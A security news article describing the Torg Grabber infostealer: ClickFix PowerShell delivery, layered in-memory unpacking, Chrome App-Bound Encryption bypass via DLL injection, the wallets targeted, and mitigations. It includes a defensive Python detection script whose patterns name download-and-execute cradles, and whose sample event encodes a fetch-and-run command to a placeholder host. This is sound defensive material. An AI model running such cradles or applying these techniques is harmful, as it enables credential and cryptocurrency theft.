Torg Grabber Infostealer Targets 728 Crypto Wallets via ClickFix PowerShell Attack

A newly identified infostealer named Torg Grabber is actively targeting 728 cryptocurrency wallet extensions across 25 browsers, using ClickFix-based PowerShell lures for initial access. Researchers at Gen Digital discovered 334 unique samples developed in just three months, with new command-and-control infrastructure deployed weekly.

Evan Mael
25 March 2026, 00:00 · 6 min read

Last updated 25 March 2026, 22:00

Severity: High
Exploit: Active Exploit
Patch status: Unavailable
Vendor: Gen Digital (threat researcher), Multiple browser vendors
Affected: Chrome, Edge, Brave, Vivaldi, ...
Category: Cybersecurity

Key Takeaways

Torg Grabber: The Infostealer Silently Raiding Your Crypto Wallets

Cybersecurity researchers at Gen Digital have identified a fast-evolving malware-as-a-service threat called Torg Grabber, an information stealer engineered to drain cryptocurrency wallets, harvest browser credentials, and exfiltrate sensitive data at scale. Distributed via the ClickFix social engineering technique, this threat marks a significant escalation in the infostealer landscape.

What Happened

In March 2026, Gen Digital published a detailed technical report exposing Torg Grabber, a credential stealer circulating since December 2025. Initially mistaken for a Vidar variant, deeper analysis revealed an entirely distinct codebase with its own C2 infrastructure and operator network. The firm documented 334 unique compiled samples across a three-month window, with new command-and-control domains registered weekly and an expanding operator base of 40 documented tags.

Technical Details

Torg Grabber gains initial access through the ClickFix technique, hijacking clipboard content to trick victims into executing malicious PowerShell commands. The malware uses a seven-layer unpacking chain (base64, XOR, AES-CBC, hex-encoding, CTR cipher, LZNT1, and AES-CBC transforms) before deploying a 683KB stealer payload entirely in memory. Since December 22, 2025, it bypasses App-Bound Encryption in Chrome, Edge, Brave, Vivaldi, and Opera by injecting a 20KB DLL into a legitimate browser process to extract the master encryption key via COM Elevation Service. Data exfiltration is performed over HTTPS routed through Cloudflare infrastructure, using chunked uploads encrypted with ChaCha20 and authenticated with HMAC-SHA256 tokens.

Impact

Torg Grabber targets 25 Chromium-based browsers and 8 Firefox variants, stealing credentials, cookies, and autofill data from 850 browser extensions. Of these, 728 are cryptocurrency wallet extensions, covering virtually every major and obscure wallet including MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, and OKX. The malware also targets 103 password manager and 2FA extensions (LastPass, 1Password, Bitwarden, Authy), along with 19 note-taking apps, desktop crypto wallet applications, Discord, Telegram, Steam, VPN clients, FTP tools, and email clients. Additionally, it profiles the host system, captures screenshots, steals files from Desktop and Documents folders, and can execute attacker-supplied shellcode.

Mitigation

No patch is applicable for this threat as it is a malware campaign rather than a software vulnerability. Users should never run clipboard-based commands prompted by websites. Organizations are advised to enforce application allowlisting, restrict PowerShell execution via policy, deploy endpoint detection and response (EDR) solutions capable of detecting reflective DLL loading and in-memory execution, and monitor for anomalous HTTPS traffic to Cloudflare-hosted infrastructure. Crypto wallet holders should consider using hardware wallets and enabling all available browser security features.
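The ClickFix delivery described above starts with a PowerShell one-liner pasted into the Run dialog, which gives defenders a concrete telemetry shape to hunt for. The following is an added detection example, not code from Gen Digital's report or from this article: it scores process-creation events on parent/child relationship and on indicator tokens, decoding any `-EncodedCommand` payload first so that encoding alone does not hide them. The event field names, indicator weights, threshold and sample events are all constructed for this illustration.

```python
import base64
import re

# Weighted indicators of pasted one-liners: hidden window, policy bypass and
# download-and-execute cradles. Patterns and weights are assumptions here.
INDICATORS = {
    r"-w(?:indowstyle)?\s+hidden": 2,
    r"-e(?:xecutionpolicy|p)\s+bypass": 2,
    r"\b(?:iex|invoke-expression)\b": 3,
    r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b": 3,
    r"frombase64string": 1,
}
# -EncodedCommand (-enc/-e/-ec) carries base64 of a UTF-16LE script.
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand script, or '' if none or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def score_event(event: dict) -> int:
    """Score a process-creation event on its command line plus decoded payload."""
    cmd = event["cmdline"]
    text = f"{cmd} {decode_encoded_command(cmd)}".lower()
    # Win+R children run under explorer.exe; a script host launched that way
    # rather than from a console or scheduled task is the ClickFix shape.
    score = 2 if (event["parent"].lower() == "explorer.exe"
                  and "powershell" in event["image"].lower()) else 0
    return score + sum(w for p, w in INDICATORS.items() if re.search(p, text))

def flag_clickfix(events, threshold: int = 6) -> list:
    """PIDs scoring at or above the threshold (the threshold is a tuning assumption)."""
    return [e["pid"] for e in events if score_event(e) >= threshold]

# Constructed telemetry, not real IoCs; the cradle target is a reserved TLD.
_ENC = base64.b64encode("iex (irm https://example.invalid/x)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"pid": 1001, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -w hidden -ep bypass -enc {_ENC}"},
    {"pid": 1002, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"pid": 1003, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe"},
]
```

Only the first sample event crosses the threshold; an explorer-spawned PowerShell with no suspicious arguments scores low, which is what keeps a rule like this from paging on every interactive shell.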

Frequently Asked Questions

What is Torg Grabber?
Torg Grabber is a Malware-as-a-Service (MaaS) information stealer that targets cryptocurrency wallet extensions, browser credentials, and sensitive data. It was first identified in December 2025 and is actively developed with new samples released weekly.

How does Torg Grabber infect systems?
Torg Grabber uses the ClickFix social engineering technique to hijack clipboard content, tricking victims into pasting and executing malicious PowerShell commands. This gives the malware initial access to the compromised system.

Which cryptocurrency wallets are targeted?
Torg Grabber targets 728 cryptocurrency wallet browser extensions, including major wallets such as MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, OKX, Keplr, Rabby, and hundreds of lesser-known wallets.

Does Torg Grabber bypass Chrome security?
Yes. Since December 22, 2025, Torg Grabber includes a module that bypasses Google Chrome's App-Bound Encryption (ABE) by injecting a DLL into the browser process to extract the master encryption key via COM Elevation Service.

Is there a patch available for Torg Grabber?
No. Torg Grabber is a malware campaign, not a software vulnerability. Protection relies on security awareness, EDR solutions, PowerShell restrictions, and use of hardware wallets for cryptocurrency storage.

About the Author

Evan Mael

Senior IT Journalist & Cloud Architect

Microsoft MCSA-certified Cloud Architect | Fortinet-focused. I modernize cloud, hybrid & on-prem infrastructure for reliability, security, performance and cost control - sharing field-tested ops & troubleshooting.
